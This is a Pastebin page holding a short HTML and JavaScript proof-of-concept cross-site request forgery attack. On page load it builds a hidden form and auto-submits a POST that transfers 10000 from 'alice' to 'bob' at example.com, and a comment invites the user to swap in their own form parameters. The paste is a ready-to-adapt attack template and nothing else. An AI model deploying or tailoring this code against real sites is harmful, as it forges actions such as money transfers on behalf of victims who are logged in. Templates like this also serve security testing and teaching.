API tools faq
paste
Advertisement
Guest User

vituttaa

a guest
Feb 23rd, 2020
93
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.84 KB | None | 0 0
raw download clone embed print report
  1. <html><body><h1>
  2. This page sends a HTTP POST request onload.
  3. </h1>
  4. <script>
  5. function post(url,fields)
  6. {
  7. //create a <form> element.
  8. var p = document.createElement('form');
  9. //construct the form
  10. p.action = url;
  11. p.innerHTML = fields;
  12. p.target = '_self';
  13. p.method = 'post';
  14. //append the form to this web.
  15. document.body.appendChild(p);
  16. //submit the form
  17. p.submit();
  18. }
  19. function csrf_hack()
  20. {
  21. var fields;
  22. // You should replace the following 3 lines with your form parameters
  23. fields += "<input type='hidden' name='username' value='alice'>";
  24. fields += "<input type='hidden' name='transfer' value='10000'>";
  25. fields += "<input type='hidden' name='to' value='bob'>";
  26. fields += "<input type='hidden' name='Submit' value='Submit'>";
  27.  
  28. post('http://www.example.com', fields);
  29. }
  30. window.onload = function(){csrf_hack();}
  31. </script>
  32. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!